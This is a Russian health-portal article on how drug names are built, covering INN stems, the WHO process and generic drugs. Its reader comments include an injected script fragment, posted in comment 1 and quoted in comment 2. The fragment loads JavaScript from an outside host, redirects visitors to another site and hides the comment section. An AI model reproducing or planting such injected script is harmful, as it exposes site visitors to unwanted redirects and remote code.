Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Откуда у лекарств такие с...  >>  Откуда у лекарств такие странные названия
 
Обратная связь
 

Откуда у лекарств такие странные названия

Размер шрифта
23 января 2012 08:00
  • google_analytics: false
  • Нравится

Оселтамивир. Эзомепразол. Трастузумаб. Это не слова из старинного проклятия, а названия современных медицинских препаратов. Как и зачем фармацевты придумывают такие зубодробительные названия для лекарств?

Хотели как проще

Если бы не фармацевты, то в аптеки нам пришлось бы ходить со справочниками по химии, так как лекарства, которые являются сложными химическими соединениями, именовались бы в соответствии с номенклатурой Международного союза теоретической и прикладной химии (ИЮПАК). Чтобы купить парацетамол, вам бы пришлось сказать: «Девушка, дайте мне пожалуйста N-(4-гидроксифенил)ацетамид».

Положить конец неразберихе и прийти к единому стандарту наименования лекарств решили в 1950 году специалисты Всемирной организации здравоохранения. Они создали систему Международных непатентованных наименований (МНН). Затем были организованы национальные советы, которые сейчас работают в связке с МНН. В 1961 году Фармакопейная конвенция США, Американская медицинская ассоциация и Американская ассоциация фармакологов создали Совет по принятым названиям США (United States Adopted Names). Эта структура считается одной из наиболее влиятельных. Похожие организации существуют во Франции, Великобритании и Японии.

МНН выбирает уникальное имя для каждого нового лекарства. Это обязательный этап для лекарства, чтобы попасть на рынок. Однако не стоит путать коммерческое название, например, «Зовиракс» с названием, принятым МНН – «ацикловир». В большинстве случаев названия МНН совпадают с рекомендациями национальных организаций. Но есть и исключения: парацетамол в США называется ацетаминофен и имеет более 10 коммерческих названий (почему так происходит, читайте в конце статьи)!

Как назвать лекарство

Процесс наименования лекарства по системе МНН чрезвычайно долог, в среднем он занимает 26,4 месяцев. Специалисты присваивают названия только одиночным, четко определимым веществам, которые можно однозначно охарактеризовать химической номенклатурой. ВОЗ не подбирает имена для смесей, травяных препаратов, гомеопатии и всем известных препаратов с устойчивыми именами (морфин, кодеин). Новое название публикуется в журнале ВОЗ Drug Information на трех языках: английском, французском и испанском, а также включает латинский вариант каждого международного непатентованного названия. Затем МНН переводится на арабский, китайский и русский язык.

Тут и возникают трудности. Название может звучать четко и красиво на английском, но непонятно и даже неприятно на других языках. Чаще всего это случается из-за присутствия букв h, j, k, и w. Поэтому специалисты МНН решили разработать свою собственную систему приставок, суффиксов и корней, которая постепенно развивается в полноценную дисциплину. Таким образом, название лекарства составляется из наборных элементов, которые являются греческими и латинскими корнями. Само слово образно описывает характеристики лекарства. Например, окончание «празол» в слове «эзомепразол» означает, что лекарство лечит язву. Приставка «эз» обозначает форму молекулы лекарства (хиральность). Это и объясняет, почему похожие по методу действия лекарства имеют одинаковые элементы в названии.

Вот примеры корней, которые позволят вам быстро расшифровать назначение лекарства

Коксиб – ингибиторы Циклооксигеназы-2, тип противовоспалительных препаратов (например, целекоксиб)

Маб – моноклональные антитела (например, инфликсимаб для лечения ревматоидного артрита)

Олол – бета-блокаторы (например, атенолол для заболеваний сердца)

Оксетин – производные флуоксетина, группа антидепрессантов

Прил – ингибиторы ангиотензин-превращающего фермента (например, каптоприл для лечения почек)

Ио – йодосодержащие радиофармпрепаратов (например, иобенгуан для лечения заболеваний щитовидной железы)

Иногда название лекарства имеет художественные элементы. Например, отсылает к его разработчику, как например, карфилзомиб, который был назван в честь жены молекулярного биолога Филлипа Уиткома и его жены Карлы.

Что такое лекарства-дженерики

Иногда лекарства имеют одно и то же активное вещество по МНН, но выпускаются разными производителями. Тогда они продаются под разными коммерческими именами. Такие лекарства называются дженериками и стоят в несколько раз дешевле оригинала, хотя работают зачастую не хуже. Стоит ли покупать дженерики и экономить деньги, лучше посоветуйтесь врачом.

Подготовлено по материалам журнала «Новости химии и инженерии» Американского общества химиков.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:00

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

2 - Гость

10 октября 2015 в 19:16

Цитировать   |   Пожаловаться

zzzzzz 01 июля 2015 в 00:00
--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();
 далбайоб шоли?

Статьи

       
Спор «противоположного» с «подобным».   Ценам на лекарства приказали остановиться   Патентованные и воспроизведенные лекарства   Первый портал для провизоров Люди Pro обновился: следить за новостями фарма-индустрии стало проще  
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.